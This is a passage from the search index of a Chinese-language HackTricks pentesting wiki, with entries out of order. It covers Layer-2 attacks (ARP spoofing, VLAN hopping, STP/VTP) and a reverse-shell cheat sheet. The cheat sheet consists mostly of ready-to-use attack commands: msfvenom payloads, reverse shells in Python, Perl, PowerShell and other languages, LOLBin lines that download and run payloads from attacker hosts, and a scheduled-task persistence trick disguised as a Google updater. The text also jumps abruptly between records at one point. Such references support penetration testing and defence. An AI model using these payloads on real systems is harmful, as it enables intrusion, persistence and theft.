windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 创建用户","id":"1168","title":"创建用户"},"1169":{"body":"bash msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - 
CheatSheet » CMD Shell","id":"1169","title":"CMD Shell"},"117":{"body":"ARP Spoofing 是通过发送 gratuitous ARPResponses 来表明某台机器的 IP 对应我们的设备的 MAC。然后,受害者会修改 ARP 表,并且每当想要联系该被伪造的 IP 时,都会联系到我们的机器。 Bettercap bash arp.spoof on\\nset arp.spoof.targets #Specific targets to ARP spoof (default=)\\nset arp.spoof.whitelist #Specific targets to skip while spoofing\\nset arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)\\nset arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false) Arpspoof bash echo 1 > /proc/sys/net/ipv4/ip_forward\\narpspoof -t 192.168.1.1 192.168.1.2\\narpspoof -t 192.168.1.2 192.168.1.1","breadcrumbs":"Pentesting Network » ARP spoofing","id":"117","title":"ARP spoofing"},"1170":{"body":"bash msfvenom -a x86 --platform Windows -p windows/exec CMD=\\"powershell \\\\\\"IEX(New-Object Net.webClient).downloadString(\'http://IP/nishang.ps1\')\\\\\\"\\" -f exe > pay.exe\\nmsfvenom -a x86 --platform Windows -p windows/exec CMD=\\"net localgroup administrators shaun /add\\" -f exe > pay.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 执行命令","id":"1170","title":"执行命令"},"1171":{"body":"bash msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 编码器","id":"1171","title":"编码器"},"1172":{"body":"bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 嵌入可执行文件中","id":"1172","title":"嵌入可执行文件中"},"1173":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Linux Payloads","id":"1173","title":"Linux Payloads"},"1174":{"body":"bash msfvenom -p 
linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf\\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 反向 Shell","id":"1174","title":"反向 Shell"},"1175":{"body":"bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 绑定 Shell","id":"1175","title":"绑定 Shell"},"1176":{"body":"bash msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b \'\\\\x00\' > solshell.elf","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » SunOS (Solaris)","id":"1176","title":"SunOS (Solaris)"},"1177":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » MAC Payloads","id":"1177","title":"MAC Payloads"},"1178":{"body":"bash msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 反向Shell:","id":"1178","title":"反向Shell:"},"1179":{"body":"bash msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 绑定 Shell","id":"1179","title":"绑定 Shell"},"118":{"body":"通过发送大量具有不同源 MAC 地址的数据包来使交换机的 CAM 表溢出。当 CAM 表满时,交换机会开始像集线器一样工作(广播所有流量)。 bash macof -i 在现代交换机中,这个漏洞已被修复。","breadcrumbs":"Pentesting Network » MAC Flooding - CAM overflow","id":"118","title":"MAC Flooding - CAM overflow"},"1180":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 基于网络的有效载荷","id":"1180","title":"基于网络的有效载荷"},"1181":{"body":"反向壳 l bash msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php\\ncat 
shell.php | pbcopy && echo \'<?php \' > shell.php && pbpaste >> shell.php # -f raw omits the opening tag, so prepend it before the file is served
学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Bash","id":"1189","title":"Bash"},"119":{"body":"动态中继 The Dynamic Trunking Protocol (DTP) 是一个链路层协议,旨在实现一个自动中继系统,允许交换机自动选择端口进入 trunk 模式 (Trunk) 或 非 trunk 模式。部署 DTP 常被视为网络设计不佳的迹象,强调了仅在必要时手动配置中继并确保良好文档的重要性。 默认情况下,交换机端口被设置为以 Dynamic Auto 模式运行,这意味着当邻近交换机发起时,它们准备开始 trunking。安全问题出现在 pentester 或攻击者连接到交换机并发送 DTP Desirable frame,使端口进入 trunk 模式时。此操作使攻击者能够通过分析 STP 帧 来枚举 VLAN,并通过建立虚拟接口 绕过 VLAN 分段。 许多交换机默认启用 DTP,攻击者可借此模拟交换机行为,从而访问所有 VLAN 的流量。脚本 dtpscan.sh 可用于监视接口,显示交换机当前是 Default、Trunk、Dynamic、Auto 还是 Access 模式——后者是唯一对 VLAN hopping attacks 免疫的配置。该工具用于评估交换机的易受攻击状态。 如果识别出网络存在此类漏洞,可以使用 Yersinia 工具通过 DTP 协议“enable trunking”,从而观察来自所有 VLAN 的数据包。 bash apt-get install yersinia #Installation\\nsudo apt install kali-linux-large #Another way to install it in Kali\\nyersinia -I #Interactive mode\\n#In interactive mode you will need to select a interface first\\n#Then, you can select the protocol to attack using letter \\"g\\"\\n#Finally, you can select the attack using letter \\"x\\" yersinia -G #For graphic mode 要枚举 VLANs,也可以使用脚本 DTPHijacking.py **. 请 不要在任何情况下中断该脚本。它每三秒注入一次 DTP Desirable。 动态创建的 switch 上的 trunk 通道只存活五分钟。五分钟后,trunk 会掉线。 sudo python3 DTPHijacking.py --interface eth0 我想指出, Access/Desirable (0x03) 表示 DTP 帧是 Desirable 类型,这会指示端口切换到 Trunk 模式。并且 802.1Q/802.1Q (0xa5 表示 802.1Q 封装类型。 通过分析 STP 帧, 我们了解到 VLAN 30 和 VLAN 60 的存在。 针对特定 VLAN 的攻击 一旦你知道 VLAN IDs 和 IPs 值,你可以 配置一个虚拟接口以攻击特定 VLAN . 
如果 DHCP 不可用,则使用 ifconfig 设置静态 IP 地址。 root@kali:~# modprobe 8021q\\nroot@kali:~# vconfig add eth1 250\\nAdded VLAN with VID == 250 to IF -:eth1:-\\nroot@kali:~# dhclient eth1.250\\nReloading /etc/samba/smb.conf: smbd only.\\nroot@kali:~# ifconfig eth1.250\\neth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65\\ninet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0\\ninet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link\\nUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\\nRX packets:19 errors:0 dropped:0 overruns:0 frame:0\\nTX packets:13 errors:0 dropped:0 overruns:0 carrier:0\\ncollisions:0 txqueuelen:0\\nRX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) root@kali:~# arp-scan -I eth1.250 10.121.5.0/24 bash # Another configuration example\\nmodprobe 8021q\\nvconfig add eth1 20\\nifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up bash # Another configuration example\\nsudo vconfig add eth0 30\\nsudo ip link set eth0.30 up\\nsudo dhclient -v eth0.30 Automatic VLAN Hopper 前面讨论的针对其他 VLAN 的、涉及 Dynamic Trunking and creating virtual interfaces an discovering hosts inside 的攻击可以由该工具 自动执行 : https://github.com/nccgroup/vlan-hopping---frogger Double Tagging 如果攻击者知道受害主机的 MAC, IP and VLAN ID of the victim host ,他可以尝试对一个帧进行 double tag a frame (同时带上其本身的 VLAN 和受害者的 VLAN)并发送该数据包。由于 victim won\'t be able to connect back 给攻击者, best option for the attacker is communicate via UDP ,可选择像 SNMP 这样能执行某些有趣操作的协议。 攻击者的另一个选择是发起对 TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (可能通过 internet)。然后,如果受害者向攻击者控制的第二台主机发送了数据包,攻击者就可以在该主机上嗅探到这些数据包。 要执行此攻击可以使用 scapy: pip install scapy python from scapy.all import *\\n# Double tagging with ICMP packet (the response from the victim isn\'t double tagged so it will never reach the attacker)\\npacket = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst=\'192.168.1.10\')/ICMP()\\nsendp(packet) Lateral VLAN Segmentation Bypass 如果你 能够访问你直接连接的 switch ,就有能力在网络内 bypass VLAN segmentation 。只需将端口 切换到 trunk 模式 (也称为 trunk),为目标 VLAN 的 ID 
创建虚拟接口,并配置一个 IP 地址。你可以尝试动态请求地址(DHCP),也可以静态配置,视具体情况而定。 Lateral VLAN Segmentation Bypass Layer 3 Private VLAN 绕过 在某些环境(例如 guest wireless networks)中,会实施 port isolation(也称为 private VLAN) 设置以防止连接到同一无线接入点的客户端彼此直接通信。然而,已发现一种可以规避这些隔离措施的技术。该技术利用网络 ACL 的缺失或配置不当,使得 IP 包可以通过 router 被路由到同一网络上的另一个客户端。 该攻击通过构造一个 携带目标客户端 IP 但使用 router 的 MAC 的数据包 来执行。这会导致 router 错误地将数据包转发到目标客户端。此方法类似于 Double Tagging Attacks 中使用的方式,即利用能够控制的、对受害者可访问的主机来利用该安全缺陷。 攻击的关键步骤: 构造数据包: 特别构造一个数据包,包含目标客户端的 IP,但使用 router 的 MAC 地址。 利用 router 行为: 将该构造的数据包发送到 router,由于配置原因,router 将数据包重定向到目标客户端,从而绕过 private VLAN 设置提供的隔离。","breadcrumbs":"Pentesting Network » 802.1Q VLAN / DTP 攻击","id":"119","title":"802.1Q VLAN / DTP 攻击"},"1190":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Shells - Windows","id":"1190","title":"Shells - Windows"},"1191":{"body":"页面 lolbas-project.github.io 面向 Windows,就像 https://gtfobins.github.io/ 面向 linux。 显然, Windows 中没有 SUID 文件或 sudo 权限 ,但了解一些 binaries 是 如何 被(滥)用来执行某些意想不到的操作(例如 execute arbitrary code )是很有用的。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Lolbas","id":"1191","title":"Lolbas"},"1192":{"body":"bash nc.exe -e cmd.exe ","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » NC","id":"1192","title":"NC"},"1193":{"body":"受害者 ncat.exe -e \\"cmd.exe /c (cmd.exe 2>&1)\\"\\n#Encryption to bypass firewall\\nncat.exe --ssl -e \\"cmd.exe /c (cmd.exe 2>&1)\\" 攻击者 ncat -l \\n#Encryption to bypass firewall\\nncat -l --ssl","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » NCAT","id":"1193","title":"NCAT"},"1194":{"body":"sbd 是一个便携且安全的 Netcat 替代工具 。它可在类 Unix 系统和 Win32 上运行。具有强加密、程序执行、可自定义源端口和持续重连等特性,sbd 为 TCP/IP 通信提供了一个多功能的解决方案。对于 Windows 用户,可使用来自 Kali Linux 发行版的 sbd.exe 作为 Netcat 的可靠替代品。 bash # Victims machine\\nsbd -l -p 4444 -e bash -v -n\\nlistening on port 4444 # Atackers\\nsbd 10.10.10.10 4444\\nid\\nuid=0(root) gid=0(root) groups=0(root)","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » SBD","id":"1194","title":"SBD"},"1195":{"body":"bash #Windows\\nC:\\\\Python27\\\\python.exe -c \\"(lambda __y, __g, __contextlib: [[[[[[[(s.connect((\'10.11.0.37\', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type(\'except\', (), {\'__enter__\': lambda self: None, \'__exit__\': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True 
for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type(\'try\', (), {\'__enter__\': lambda self: None, \'__exit__\': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g[\'p2s_thread\'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g[\'s2p_thread\'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g[\'p\'] in [(subprocess.Popen([\'\\\\\\\\windows\\\\\\\\system32\\\\\\\\cmd.exe\'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g[\'s\'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g[\'p2s\'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l[\'s\'].send(__l[\'p\'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l[\'s\'], __l[\'p\'] in [(s, p)]][0])({}), \'p2s\')]][0] for __g[\'s2p\'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l[\'p\'].stdin.write(__l[\'data\']), __after())[1] if (len(__l[\'data\']) > 0) else __after())(lambda: __this()) for __l[\'data\'] in [(__l[\'s\'].recv(1024))]][0] if True else __after())())(lambda: None) for __l[\'s\'], __l[\'p\'] in [(s, p)]][0])({}), \'s2p\')]][0] for __g[\'os\'] in [(__import__(\'os\', __g, __g))]][0] for __g[\'socket\'] in [(__import__(\'socket\', __g, __g))]][0] for __g[\'subprocess\'] in [(__import__(\'subprocess\', __g, __g))]][0] for __g[\'threading\'] in [(__import__(\'threading\', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__(\'contextlib\'))\\"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Python","id":"1195","title":"Python"},"1196":{"body":"bash perl -e \'use 
Socket;$i=\\"ATTACKING-IP\\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\"tcp\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\">&S\\");open(STDOUT,\\">&S\\");open(STDERR,\\">&S\\");exec(\\"/bin/sh -i\\");};\'\\nperl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,\\"ATTACKING-IP:80\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Perl","id":"1196","title":"Perl"},"1197":{"body":"bash #Windows\\nruby -rsocket -e \'c=TCPSocket.new(\\"[IPADDR]\\",\\"[PORT]\\");while(cmd=c.gets);IO.popen(cmd,\\"r\\"){|io|c.print io.read}end\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Ruby","id":"1197","title":"Ruby"},"1198":{"body":"bash lua5.1 -e \'local host, port = \\"127.0.0.1\\", 4444 local socket = require(\\"socket\\") local tcp = socket.tcp() local io = require(\\"io\\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \'r\') local s = f:read(\\"*a\\") f:close() tcp:send(s) if status == \\"closed\\" then break end end tcp:close()\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Lua","id":"1198","title":"Lua"},"1199":{"body":"攻击者 (Kali) bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response 受害者 bash #Linux\\nopenssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows\\nopenssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect :","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » OpenSSH","id":"1199","title":"OpenSSH"},"12":{"body":"Venacus 是一个数据泄露(leak)搜索引擎。 
我们提供随机字符串搜索(如谷歌)覆盖所有类型的大大小小的数据泄露——不仅仅是大的——来自多个来源的数据。 人们搜索、AI 搜索、组织搜索、API(OpenAPI)访问、theHarvester 集成,所有渗透测试人员所需的功能。 HackTricks 继续成为我们所有人的一个伟大学习平台,我们为赞助它感到自豪! Venacus | Data breach search engine","breadcrumbs":"HackTricks » Venacus","id":"12","title":"Venacus"},"120":{"body":"VTP (VLAN Trunking Protocol) 将 VLAN 管理集中化。它使用 revision numbers 来维护 VLAN 数据库的完整性;任何修改都会使该数字递增。switches 会采用具有更高 revision number 的配置,更新它们自己的 VLAN 数据库。 VTP Domain Roles VTP Server: 管理 VLAN——创建、删除、修改。它向域内成员广播 VTP announcements。 VTP Client: 接收 VTP announcements 以同步其 VLAN 数据库。该角色被限制不能本地修改 VLAN 配置。 VTP Transparent: 不参与 VTP 更新但会转发 VTP announcements。不受 VTP 攻击影响,其 revision number 始终为零。 VTP Advertisement Types Summary Advertisement: 由 VTP server 每 300 秒广播一次,携带域的基本信息。 Subset Advertisement: 在 VLAN 配置更改后发送。 Advertisement Request: 由 VTP client 发出以请求 Summary Advertisement,通常是在检测到更高的配置 revision number 时。 VTP 漏洞仅能通过 trunk ports 利用,因为 VTP announcements 仅在这些端口上传播。Post-DTP 攻击情形可能会转向 VTP。像 Yersinia 这样的工具可以辅助进行 VTP 攻击,目标是清除 VLAN 数据库,从而有效地破坏网络。 注意:此处讨论的是 VTP version 1 (VTPv1)。 bash yersinia -G # Launch Yersinia in graphical mode 在 Yersinia 的 graphical mode 中,选择 deleting all VTP vlans 选项以清除 VLAN 数据库。","breadcrumbs":"Pentesting Network » VTP 攻击","id":"120","title":"VTP 攻击"},"1200":{"body":"bash powershell -exec bypass -c \\"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(\'http://10.2.0.5/shell.ps1\')|iex\\"\\npowershell \\"IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.9:8000/ipw.ps1\')\\"\\nStart-Process -NoNewWindow powershell \\"IEX(New-Object Net.WebClient).downloadString(\'http://10.222.0.26:8000/ipst.ps1\')\\"\\necho IEX(New-Object Net.WebClient).DownloadString(\'http://10.10.14.13:8000/PowerUp.ps1\') | powershell -noprofile 执行网络调用的进程: powershell.exe Payload 已写入磁盘: NO ( 至少在我使用 procmon 查找时没有发现! 
) bash powershell -exec bypass -f \\\\\\\\webdavserver\\\\folder\\\\payload.ps1 发起网络调用的进程: svchost.exe Payload 写入磁盘: WebDAV client local cache \\\\ 一行命令: bash $client = New-Object System.Net.Sockets.TCPClient(\\"10.10.10.10\\",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \\"PS \\" + (pwd).Path + \\"> \\";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 在本文档末尾获取有关不同 Powershell Shells 的更多信息","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Powershell","id":"1200","title":"Powershell"},"1201":{"body":"From here bash mshta vbscript:Close(Execute(\\"GetObject(\\"\\"script:http://webserver/payload.sct\\"\\")\\")) bash mshta http://webserver/payload.hta bash mshta \\\\\\\\webdavserver\\\\folder\\\\payload.hta hta-psh reverse shell 示例 (使用 hta 下载并执行 PS backdoor) xml 你可以非常容易地使用 stager hta 下载并执行 Koadic zombie hta 示例 从这里 xml \\n\\n\\n\\n\\n\\n\\n\\n mshta - sct 来自此处 xml \\n\\n\\n\\n\\n\\n\\n\\n Mshta - Metasploit bash use exploit/windows/misc/hta_server\\nmsf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109\\nmsf exploit(windows/misc/hta_server) > set lhost 192.168.1.109\\nmsf exploit(windows/misc/hta_server) > exploit bash Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit 被 defender 检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Mshta","id":"1201","title":"Mshta"},"1202":{"body":"Dll hello world 示例 来自此处 bash rundll32 \\\\\\\\webdavserver\\\\folder\\\\payload.dll,entrypoint bash rundll32.exe javascript:\\"\\\\..\\\\mshtml,RunHTMLApplication\\";o=GetObject(\\"script:http://webserver/payload.sct\\");window.close(); 被 
defender 检测到 Rundll32 - sct From here xml \\n\\n\\n\\n\\n\\n\\n Rundll32 - Metasploit bash use windows/smb/smb_delivery\\nrun\\n#You will be given the command to run in the victim: rundll32.exe \\\\\\\\10.2.0.5\\\\Iwvc\\\\test.dll,0 Rundll32 - Koadic bash use stager/js/rundll32_js\\nset SRVHOST 192.168.1.107\\nset ENDPOINT sales\\nrun\\n#Koadic will tell you what you need to execute inside the victim, it will be something like:\\nrundll32.exe javascript:\\"\\\\..\\\\mshtml, RunHTMLApplication \\";x=new%20ActiveXObject(\\"Msxml2.ServerXMLHTTP.6.0\\");x.open(\\"GET\\",\\"http://10.2.0.5:9997/ownmG\\",false);x.send();eval(x.responseText);window.close();","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Rundll32","id":"1202","title":"Rundll32"},"1203":{"body":"来自此处 bash regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll regsvr32 /u /n /s /i:\\\\\\\\webdavserver\\\\folder\\\\payload.sct scrobj.dll 被 Defender 检测到 Regsvr32 – arbitrary DLL export with /i argument (gatekeeping & persistence) 除了加载远程 scriptlets (scrobj.dll) 外,regsvr32.exe 还会加载本地 DLL 并调用其 DllRegisterServer/DllUnregisterServer 导出。自定义 loader 经常滥用该行为以在与已签名的 LOLBin 混淆的情况下执行任意代码。野外观测到的两个实战提示: Gatekeeping argument: DLL 会在未通过 /i: 传入特定开关时退出,例如使用 /i:--type=renderer 模拟 Chromium 的 renderer 子进程。这可以减少意外执行并增加对沙箱的干扰。 Persistence: 计划任务调度 regsvr32 以静默并以高权限运行该 DLL,并传入所需的 /i 参数,伪装成更新程序任务: powershell Register-ScheduledTask \\\\\\n-Action (New-ScheduledTaskAction -Execute \\"regsvr32\\" -Argument \\"/s /i:--type=renderer \\\\\\"%APPDATA%\\\\Microsoft\\\\SystemCertificates\\\\.dll\\\\\\"\\") \\\\\\n-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \\\\\\n-TaskName \'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}\' \\\\\\n-TaskPath \'\\\\\\\\GoogleSystem\\\\\\\\GoogleUpdater\' \\\\\\n-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) 
\\\\\\n-RunLevel Highest See also: ClickFix clipboard‑to‑PowerShell variant that stages a JS loader and later persists with regsvr32. Clipboard Hijacking From here html \\n\\n\\n\\n\\n\\n\\n Regsvr32 - Metasploit bash use multi/script/web_delivery\\nset target 3\\nset payload windows/meterpreter/reverse/tcp\\nset lhost 10.2.0.5\\nrun\\n#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll 你可以非常容易地使用 stager regsvr 下载并执行 Koadic 僵尸","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Regsvr32","id":"1203","title":"Regsvr32"},"1204":{"body":"From here 下载一个 B64dll,将其解码并执行。 bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\InstallUtil /logfile= /LogToConsole=false /u payload.dll 下载一个 B64exe,对其进行解码并执行。 bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe 被 defender 检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Certutil","id":"1204","title":"Certutil"},"1205":{"body":"bash powershell.exe -c \\"(New-Object System.NET.WebClient).DownloadFile(\'http://10.2.0.5:8000/reverse_shell.vbs\',\\\\\\"$env:temp\\\\test.vbs\\\\\\");Start-Process %windir%\\\\system32\\\\cscript.exe \\\\\\"$env:temp\\\\test.vbs\\\\\\"\\" Cscript - Metasploit bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs 被 Defender 检测","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Cscript/Wscript","id":"1205","title":"Cscript/Wscript"},"1206":{"body":"bash \\\\\\\\webdavserver\\\\folder\\\\batchfile.bat 执行网络调用的进程: svchost.exe 写入磁盘的 Payload: WebDAV 客户端本地缓存 bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat\\nimpacket-smbserver -smb2support kali `pwd` 
bash \\\\\\\\10.8.0.3\\\\kali\\\\shell.bat 被 defender 检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » PS-Bat","id":"1206","title":"PS-Bat"},"1207":{"body":"Attacker msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi\\npython -m SimpleHTTPServer 80 受害者: victim> msiexec /quiet /i \\\\\\\\10.2.0.5\\\\kali\\\\shell.msi 已检测","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » MSIExec","id":"1207","title":"MSIExec"},"1208":{"body":"From here bash wmic os get /format:\\"https://webserver/payload.xsl\\" 示例 xsl 文件 from here : xml \\n\\n\\n\\n\\n\\n 未被检测到 你可以非常容易地使用 stager wmic 下载并执行 Koadic zombie","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Wmic","id":"1208","title":"Wmic"},"1209":{"body":"From here cmd /V /c \\"set MB=\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\MSBuild.exe\\" & !MB! /noautoresponse /preprocess \\\\\\\\webdavserver\\\\folder\\\\payload.xml > payload.xml & !MB! 
payload.xml\\" 你可以使用此技术绕过 Application Whitelisting 和 Powershell.exe 的限制。你将被提示进入 PS shell。 只需下载并执行它: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe MSBuildShell.csproj 未检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Msbuild","id":"1209","title":"Msbuild"},"121":{"body":"如果你无法在接口上捕获 BPDU 帧,成功进行 STP 攻击的可能性很低。 STP BPDU DoS 发送大量 BPDUs TCP (Topology Change Notification) 或 Conf (the BPDUs that are sent when the topology is created) 会使交换机过载并停止正常工作。 bash yersinia stp -attack 2\\nyersinia stp -attack 3\\n#Use -M to disable MAC spoofing STP TCP Attack 当发送 TCP 时,switches 的 CAM table 会在 15s 内被清除。然后,如果你持续发送这类 packets,CAM table 将不断重置(或每 15segs 一次),当它重置时,switch 会表现得像 hub。 bash yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds\\nyersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen STP Root Attack 攻击者模拟一个 switch 的行为以成为网络的 STP 